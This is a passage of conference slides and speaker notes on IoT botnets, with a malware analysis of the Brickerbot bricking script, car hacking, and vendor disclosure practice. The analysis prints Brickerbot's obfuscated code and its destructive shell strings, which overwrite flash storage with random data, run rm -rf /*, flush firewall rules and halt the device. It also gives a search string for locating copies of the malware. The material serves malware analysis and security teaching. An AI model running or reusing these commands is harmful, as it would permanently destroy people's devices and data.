○ Attacker convinces/infects normal users to become bots
○ Attacker sends commands to DOS a victim site
○ Profit
● Also Traditional, but DOSaaS
○ Attacker buys/rents bots
○ Same as the above
27. Attackers are looking to make a profit. The usual methods work, but they can be costly.
There is a need to purchase or develop one own’s malware to build up one’s botnet.
IoT botnets help to reduce those costs. Several IoT botnets have had their source code
released by their authors.
Turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no
real authentication. Default credentials. Let me repeat that, default
username/password combinations that users can’t easily change.
Mirai made the big splash, using a long list of default credentials to log in to embedded
devices and then turning them into bots.
Having a list of default creds is useful, but more benevolent trespassers on one’s
internet enabled cameras and home routers can also use the same in order to log in
and patch your systems. Linux.Wifatch s famous for being a worm that connects to
IoT devices and patches them, locking out the bad guys. Linux.Hajime does
something similar, locking down ports preventing other botnets from connecting.
As another show of good faith the authors of Linux.Wifatch released the source code to
their patching worm.[1]
Good or bad, none of these worms would gain as much traction amongst IoT devices if
it were possible to modify logins.
[1] https://gitlab.com/rav7teif/linux.wifatch
DDOS via IoT Botnet
● Similar to DDOSaaS
○ Except the bots are free
■ Even more free? Due to default creds.
Mirai
Linux.Wifatch Linux.Hajime
28. Right so, Brickerbot. Where Wifatch and Hajime do their part in securing devices by
changing passwords or disabling outside access, Brickerbot goes about it in a
slightly different manner. If we just brick all of these vulnerable IoT devices they can’t
be turned against us. Great idea.
Mudge, of L0pht and DARPA, has heard about this idea too. From reasonable folks in
the Intelligence Community and the Department of Defense. These are kind of the
folks who get to take direct action. Except it seems even they couldn’t get away with
bricking the devices of civilians in the US and all over the world.
So, Brickerbot?
29. The author of Brickerbot calls himself The Doctor. He has also posted on an
underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor
directly connects online identities or claims credit. Attribution is harder when all you
have is the end result such as a binary or obfuscated script.
A source code release like the authors of Linux.Wifatch did is a primary method of
claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is
like showing off portions of a wrecked fighter aircraft with any and all markings or
identifying information missing/removed. It makes for a great showpiece and allows
one to take or (more often)give credit. Other researchers suggest that some of the
attacks that The Doctor claimed, such as one on a major mobile carrier’s network,
were not performed by him or at least not using any of the exploits contained in
Brickerbot. Do we just take the word of whichever party we have a greater trust in?
Minus a release of source or of forensic results from various attacks it seems that’s
the default position.
Where are we?
1) We may not be able to trust Brickerbot’s ‘author’
2) The publicly available sample is essentially an obfuscated list of exploits and
‘bricking’ code
3) We need to examine the Brickerbot code a little closer to see what we have
30. Bricking is just turning useful devices into something as useful as a brick. This a
perfectly legal action that one can perform on devices that one owns. When done to
others, it is almost always illegal and occasionally an act of war.
To be clear, Brickerbot is intended to operate entirely on others’ devices.
So, Brickerbot?
● What’s bricking?
○ Turning a useful device into something as useful as a ‘brick’
31. Normally coming from the malware analysis side, I’m loath to help spread malware. In
this case, the cat is out of the bag, the horses have left the barn, and there are
dozens of pastebin like sites and one or two github accounts with a copy of the
released Brickerbot script.
So if you would like a copy of the script in order to play along at home/analyze just
google for the following line.
Brickerbot: source code
● Want a copy of Brickerbot?
○ Google
■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1”
● Mirrored on github and various pastebin like sites
32. A quick aside about the malware analysis process. Assuming you’re not doing it as a
hobby it’s almost always performed under pressure.
One never has enough time to do a complete teardown, to check every nook and cranny
of a given target. You may love puzzles and even enjoy completely solving them, but
you never have that time at work. When you eventually do, it’s known as that nearly
mythical time period ‘vacation’.
An analyst always has to deal with multiple competing pressures from various interested
parties. In no particular order:
● Customers
● Bosses/Upper Management
● Competitors
● Press
Depending on how one receives a sample one or more of these will be aware and the
clock starts ticking. One won’t always satisfy all parties. Regardless, handling the
various competing interests is the job.
Ok you don’t have unlimited time. A customer is under attack. The press is minutes from
publishing. Higher ups are yelling at your boss for an update. What do you do?
Generally one searches for IOCs(Indicators of Compromise). It really does become:
What is the least I need to see before I know my home/office/business is irrecoverable?
Aside: Malware analysis process - under pressure
● Not always enough time
○ fully unwind and solve every aspect of every puzzle within a sample
■ That’s called ‘vacation’
● Interested parties breathing down analysts’ necks
○ Customers, bosses, competitors, press
■ Handling these is ‘the job’
● Identify IOCs(Indicators of Compromise)
○ What is the least I need to see before I know my home/office/business is irrecoverable?
33. What has The Doctor dropped in our collective laps?
We’ve got a script that appears obfuscated. No line listing the interpreter the shell
should use. First steps for analyzing this malware:
1) Let’s see if it runs
a) Make sure the VM has no network access
b) Include possible runtimes(pyhton2, python3)
Shocker! It doesn't run. Why?
Running with Python3 fails. Mainly due to the print statement becoming a
function in Python 3. Thus we know it’s python 2.
Running under Python 2 it fails. Symbol not found. In this case due to additional
whitespace turning a function call into an undefined symbol. Next, we need to
remove extraneous whitespace.
Re-run and it fails again. This time due to not a single library being imported. You
have to be kidding me. The script as provided was never intended to run.
2) Maybe de-obfuscating the script would simplify the analysis
● writing a custom de-obfuscator is a good solution, unfortunately it’s a
vacation project. We’ve still got a job to do.
• It’s good to get acquainted with tokenizer.py for that eventual
vacation
● We can still write a one-off script to quickly remove dead code. Dead
code being things like If statements that are always false, or statements
Brickerbot: Getting to the heart of the issue
● Malware analysis
○ Get it running(VM, python(s), no network)
■ Nope, bad interp. Python2
■ Nope, symbol not found. ‘Extra’ whitespace.
■ Nope, libraries not imported. Enough nonsense.
○ De-obfuscate
■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’.
● (still, become friends with tokenizer.py)
■ Custom script to remove dead code
● Become friends with PyLint
■ Pretty-print remainder of source
34. Now you’ve figured it’s non-functional. Now its time to find all low hanging fruit. In this
case, the author provided the initial hint. Suggesting that one could just check the
unencrypted/unobfuscated strings.
One of the first steps in statically analyzing all malware is to extract all strings. Really.
Some of the best clues for attribution come from identifiers left in the code, or shout-
outs to colleagues or malware researchers. Egos have led to a number of malware
authors getting convicted.
In the case of Brickerbot, the simple obfuscation used by the author removes all
identifiers(i.e. variable names, messages, etc.). It’s more about not having it tied
back to the author than making it difficult to learn how the worm operates.
Another time-saver used in analysis is to read other analysts’ reports. This lets you see
if you’ve missed anything important(e.g. malware emailing all your contacts). It also
lets you re-direct analysis to portions of the malware not yet analyzed or to specific
payloads.
With Brickerbot, since it won’t run and there’s much useless code an analyst can look at
it as a container for various IoT device exploits
Brickerbot: Getting to the heart of the issue,cont.
● Malware analysis
○ Examine low-hanging fruit
■ Strings
● Seriously
● First step used by malware analysts
■ Read reports by other analysts
● Catch what you missed/ran out of time to find
● Re-prioritize resources towards areas that have greatest impact
35. Let’s look at the Brickerbot source code.
Random, similar looking variable names, more whitespace than necessary. This looks
horrible.
The if statements where the conditional is equivalent to 0 will never run the code that
follows. Dead code.
There are spaces in function calls. These don’t even help readability so the sleep call on
line 7 isn’t actually a .sleep() call, it’s just the undefined symbol time a dot and the
undefined symbol sleep.
Much of this can be removed as described earlier with a custom script to delete all dead
code.
Brickerbot: Source code - obfusc., ex. whitespace
1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
4. if 21 - 21: Oooo - I11I1Ii
5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
7. time . sleep ( 3 )
8. if 20 - 20: Oo0
9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
12. if 84 - 84: I11I1Ii * Ii11i1iIi
13. I1IiI1I1 = OOo0O0oOOOO
14. if 4 - 4: Oooo + oOOo0000o
15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
16. i111IIIiII1i = False
17. Oo0O00OOooO = False
18. IiiI1 = False
19. oOI11IIIi1II111 = True
20. iiIII11I1i1Ii = True
21. I1i = True
22. i11iiiIi = True
23. i1iii = True
24. OOoOo00oO0 = True
25. OO00oo0o = True
26. if 5 - 5: IIiII + O0oo - i1
27. if 52 - 52: oOoO0Ooo / Ii / Ii
28. if 24 - 24: oOOoO00oo0
29. i11 = [ ]
30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ]
31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
36. Ok, now things are looking a bit cleaner, we can see functions. Names that have been
obfuscated are lost, but one can eventually rename them according to their function.
Similar to what one does with functions in an unknown binary.
This is also after pretty-printing the script so that we get rid of the excessive/additional
whitespace.
Also like mentioned earlier, no libraries are imported so the code still won’t run.
You should be getting a better picture of the roadblocks placed in the code.
Brickerbot: Source code - eliminate dead code
1. def IIi1IIii11I1I(targetip, targetport):
2. global i1Iiii1i11i
3. O0000oO0O = (targetip, int(targetport))
4. I11i1I = hash(O0000oO0O)
5. if I11i1I in iIIiii11Ii1:
6. return
7. IiI1i1ii1[I11i1I] = 0
8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport))
9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60
10. iIoO000oO[I11i1I] = None
11. iIIiii11Ii1.append(I11i1I)
12.
13. def i1iiiiIi(targetip, targetport, jobhash):
14. O0000oO0O = (targetip, int(targetport))
15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16. O0OOo00o00o.setblocking(0)
17. try:
18. O0OOo00o00o.connect(O0000oO0O)
19. except:
20. pass
21. I11i1I = hash(O0OOo00o00o)
22. O00OiiI1iIiiI.append(O0OOo00o00o)
23. Oooo0[I11i1I] = (targetip, int(targetport))
24. Iii1iiiI[I11i1I] = 0
25. i1I11IIIIIi[I11i1I] = time.time()
26. I1iiO000o00o0[I11i1I] = jobhash
27. iIoO000oO[jobhash] = O0OOo00o00o
28. return O0OOo00o00o
37. Now we can go back to step 1 of the static malware analysis process, searching for
strings.
This particular segment includes commands that overwrite storage on a particular
device with random data. Routes and firewall rules are cleared from memory and
deleted. Then the system is stopped and rebooted. By now there should be no code
left to run so your home router is now useless.
So what do we know now?
1) this code is annoying
2) so is The doctor
3) all devices with the default username and password will get disabled permanently
4) Vulnerable devices are fixed now, since they can’t work they’re safe
So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger
embedded systems and Internet connected devices face similar threats? Can a
brickerbot for my washing machine be much far away? Would other larger devices
be more vulnerable? Say my car?
Brickerbot: Source code - Strings, bricking
1. ii11II +=
2. '''busybox route del default
3. cat /dev/urandom >/dev/mtdblock0 &
4. cat /dev/urandom >/dev/mtdblock1 &
5. cat /dev/urandom >/dev/mtdblock2 &
6. cat /dev/urandom >/dev/mtdblock3 &
7. cat /dev/urandom >/dev/mtdblock4 &
8. cat /dev/urandom >/dev/mtdblock5 &
9. cat /dev/urandom >/dev/mmcblk0 &
10. cat /dev/urandom >/dev/mmcblk0p9 &
11. cat /dev/urandom >/dev/mmcblk0p12 &
12. cat /dev/urandom >/dev/mmcblk0p13 &
13. cat /dev/urandom >/dev/root &
14. cat /dev/urandom >/dev/mmcblk0p8 &
15. cat /dev/urandom >/dev/mmcblk0p16 &
16. '''
17. ii11II +=
18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP
20. halt -n -f
21. reboot
22. '''
38. What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see
what an expert on automotive security thinks.
Charlie Miller is formerly of the NSA, but has made a name for himself in the private
sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain
Picard, clever and wise.
He wrote the first public exploits for Android and iOS, on the Google G1 and original
iPhone. Later he and Chris Valasek received a grant from DARPA’s Cyber Fast
Track program(the same one founded by Mudge) to research automotive security.
So he moved on from hacking PCs, to hacking phones, to hacking the very cars you
and I drive.
And people complained, ‘but those aren’t remote exploits. You’ve got to be in the car to
hack them. Any crook can do that.’
And verily, Charlie and Chris developed remote exploits.
SO when Charlie says that
1) it’s not simple to hack all the cars
2) there aren’t as many people hacking cars
you’d do well to believe him.
“Zombie” cars
39. Except movie hackers…
If you’ve seen the seminal ‘Hackers’(1996) you know that “real” hackers can be
determined by their hairstyles. Dreadlocks, in fact possibly being a necessary factor
in successful cyber attacks. E.g. Matthew Lillard’s character Cereal Killer. As one can
see Ms. Theron’s character, Cypher, must be quite the criminal hacker.
After all, the main heroes in the film(Johnson,Diesel & Statham) lack both hair and
computer skills.
Realistically one can get a better sense of the threat posed by Cypher by viewing her
environment. She is obviously well-funded(either State-backed or via independent
fortune) and employs a full team of experts. Especially experts that can hack cars.
When an underling tells her there are a couple thousand cars in the vicinity of her target,
she orders him to hack all of them. Yes, all of them. Never mind the brand, the
Telematics system, any and all firmware(or lack of such) within each of these
thousands of automobiles. Those hacker dreads must confer some extreme hacking
powers.
“Zombie” cars - “It’s Zombie time.”
We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
40. We should just brick everybody's car in a 5 mile radius. It’s not like anyone needs to get
to work, pick up their kids, drive a buddy to the hospital, drive for lyft/uber. Maybe
they didn’t really need their personal cars.
This goes back to the original idea of abdicating any responsibility as developers and
manufacturers of IoT devices to Law Enforcement. Or in the case of The Doctor, to
vigilantes.
It's a common idea that fixing bugs at the earliest point in development is many times
cheaper and less dangerous than patching them after release. Though we can’t
always fix before customers take possession.
It’s possible to release firmware updates and patches afterwards, but there is not always
incentive to do so. The manufacturer of my car will occasionally release updates for
the Telematics system living in my dash, but the manufacturer of my new Internet
enabled Toaster might say it’s no longer supported.
This is not usually a problem. Until attackers not as benevolent as the Wifatch and
Hajime authors or Charlie & Chris will discover and exploit a vulnerability to turn your
new Mustang into a torpedo. With Miller & Valasek I know they’ll make an effort to
reach out to the manufacturer and enable a patch or update to be created.
We can learn lessons from the way vulnerability reports are handled on other platforms.
Embedded systems and IoT devices are not as dissimilar from desktop and server
PCs as one would think. The same way security researchers reach out to Apple or
Google for bugs in their phone OSes, they can reach out to various device
manufacturers.
“Zombie” cars
So in order to stop Criminals from hijacking our cars and turning them into
bombs...
41. It can be difficult to get industry members to agree on issues like vulnerability disclosure,
regular patching and in general working with outside security researchers. It is very
much like the common description of ‘herding cats’. While many of the players may
look similar and even share similar interests it is difficult to get them all to come to
the table.
Each company has no special reason to trust another. It usually takes commonly trusted
individuals and backing from companies with greater resources just to begin the
conversation.
Fortunately we’re seeing motion towards that goal in a small subset of the Internet of
Things/Internet-connected embedded devices.
Security: Gaining industry buy-in
43. How do we get all these cats eating peacefully at the same bowl?
We can start by selecting someone credible and trusted widely as a focal point for the
multitude of players. Get a Pied Piper that all the cats can turn towards. In this case
that would be Renderman(Brad Haines), a well known and respected security
researcher. He’s also a CISSP.
Renderman has a wide range of experience with penetration testing, wireless security
and computer security research. A published author and a speaker at numerous
computer security(Black Hat USA) and hacker(Def Con) conferences.
The interesting part of this is that Renderman is operating within the category of items
that fall under the heading ‘Adult Sex Toys’ on Amazon.com.
One might have expected that other personal IoT devices, such as fitness trackers,
would be where more security research would occur. The recent information leak
from Strava which showed running paths of US armed forces members is one such
area of research. Here a personal IoT device’s lack of default security and privacy
controls ends up violating Operational Security(OPSEC) at US bases around the
world. The main threat is not the bases’ locations(arguably opposition forces and
host countries already have that knowledge), but more that of current intelligence
confirming activity at the bases and possibly number/names of active personnel.
Renderman has accomplished something that those of us in other specialties(e.g.
Antivirus/Anti-malware) haven’t, he’s managed to convince disparate manufacturers
to trust him; both as a source of best security practices and as an interface to the
wider community of vulnerability researchers and hackers.
Security: Gaining industry buy-in; Doing it right
1. Get someone credible to organize/liaise with industry players
a. Renderman
2. Provide guidelines for disclosure to vendors
3. Provide guidelines for communication with researchers
4. Suggest/provide solutions
a. Mostly suggest. Nobody’s using provided code.
5. Branding
a. Internet of Dongs Project
b. DVEs(Dong Vulnerability and Exposures)
44. Q: What sort of threat model are IoT vendors using?
A: Good question. Default credentials implies there is no threat model. A basic threat
model would take into account the simplest attacker, your common script kiddie.
Take a dictionary of default credentials and list of target addresses and feed them to
a scanner or ready made tool. Even after the number of in the wild IoT worms we’ve
seen, the script kiddie would still end up with control of a significant number of IoT
devices. Unfortunately security is currently at best an afterthought for a large number
of vendors.
A proper threat model would need to take into account attackers of various skill levels
and budgets.
Script kiddies might be kept at bay by simply allowing for users to easily change
passwords. Or using public-key encryption to ensure firmware updates come only
from the manufacturer. Which would also protect the device from script kiddies. Best
practices in security will overall protect the bulk of users. If your threat model also
includes Nation-State actors, then its likely your development budget is of a
commensurate size.
It would also need to consider the attack surface for a given device. Does it connect to
the Internet? Is the firmware protected from modification? Can an attacker cause the
Li ion batteries to overload/ignite? Is it possible to inject malicous traffic into the
stream of commands sent to the device?
Regardless, these are factors that need to be considered at the beginning of the
development cycle and not once product is in the hands of consumers. Once there, it
is considerably more expensive to mitigate(e.g by patching, or recalling devices).
Questions?